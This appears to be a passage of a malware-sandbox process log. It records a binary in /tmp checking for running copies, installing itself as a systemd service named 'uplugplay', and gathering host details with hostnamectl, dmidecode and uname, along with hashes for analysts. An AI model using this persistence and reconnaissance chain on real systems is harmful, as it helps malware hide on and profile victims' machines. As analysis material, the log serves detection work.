                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:54
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:54
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/pidof
                                                                Arguments:pidof na.elf
                                                                File size:27016 bytes
                                                                MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                Start time (UTC):23:47:56
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:56
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pgrep uplugplay"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:56
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:56
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/pgrep
                                                                Arguments:pgrep uplugplay
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:47:57
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:57
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pgrep upnpsetup"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:57
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:57
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/pgrep
                                                                Arguments:pgrep upnpsetup
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:47:58
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:58
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pidof upnpsetup"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:58
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:58
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/pidof
                                                                Arguments:pidof upnpsetup
                                                                File size:27016 bytes
                                                                MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                Start time (UTC):23:47:59
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:59
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "systemctl daemon-reload"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:59
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:59
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl daemon-reload
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "systemctl enable uplugplay.service"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl enable uplugplay.service
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "systemctl start uplugplay.service"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl start uplugplay.service
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:48:00
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                File size:22760 bytes
                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:48:01
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                File size:22760 bytes
                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:/usr/sbin/uplugplay
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:02
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c hostnamectl
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/hostnamectl
                                                                Arguments:hostnamectl
                                                                File size:26848 bytes
                                                                MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c hostnamectl
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/hostnamectl
                                                                Arguments:hostnamectl
                                                                File size:26848 bytes
                                                                MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "dmidecode --type baseboard"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/dmidecode
                                                                Arguments:dmidecode --type baseboard
                                                                File size:121856 bytes
                                                                MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c uptime
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/uptime
                                                                Arguments:uptime
                                                                File size:14568 bytes
                                                                MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "uname -a"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/uname
                                                                Arguments:uname -a
                                                                File size:39288 bytes
                                                                MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "dmidecode --type baseboard"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:06
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/dmidecode
                                                                Arguments:dmidecode --type baseboard
                                                                File size:121856 bytes
                                                                MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "dmidecode --type baseboard"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/dmidecode
                                                                Arguments:dmidecode --type baseboard
                                                                File size:121856 bytes
                                                                MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c dmidecode
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/dmidecode
                                                                Arguments:dmidecode
                                                                File size:121856 bytes
                                                                MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c uptime
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/uptime
                                                                Arguments:uptime
                                                                File size:14568 bytes
                                                                MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/sbin/uplugplay
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "uname -a"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:48:09
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/uname
                                                                Arguments:uname -a
                                                                File size:39288 bytes
                                                                MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/libexec/fwupd/fwupd
                                                                Arguments:-
                                                                File size:260616 bytes
                                                                MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/gpg
                                                                Arguments:/usr/bin/gpg --version
                                                                File size:1066992 bytes
                                                                MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/libexec/fwupd/fwupd
                                                                Arguments:-
                                                                File size:260616 bytes
                                                                MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                                Start time (UTC):23:48:03
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/gpg
                                                                Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                                File size:1066992 bytes
                                                                MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                                Start time (UTC):23:48:04
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:48:04
                                                                Start date (UTC):31/03/2025
                                                                Path:/lib/systemd/systemd-hostnamed
                                                                Arguments:/lib/systemd/systemd-hostnamed
                                                                File size:35040 bytes
                                                                MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/libexec/fwupd/fwupd
                                                                Arguments:-
                                                                File size:260616 bytes
                                                                MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/gpg
                                                                Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                                File size:1066992 bytes
                                                                MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/libexec/fwupd/fwupd
                                                                Arguments:-
                                                                File size:260616 bytes
                                                                MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                                Start time (UTC):23:48:05
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/gpg
                                                                Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                                File size:1066992 bytes
                                                                MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/libexec/fwupd/fwupd
                                                                Arguments:-
                                                                File size:260616 bytes
                                                                MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                                Start time (UTC):23:48:07
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/gpg
                                                                Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                                File size:1066992 bytes
                                                                MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf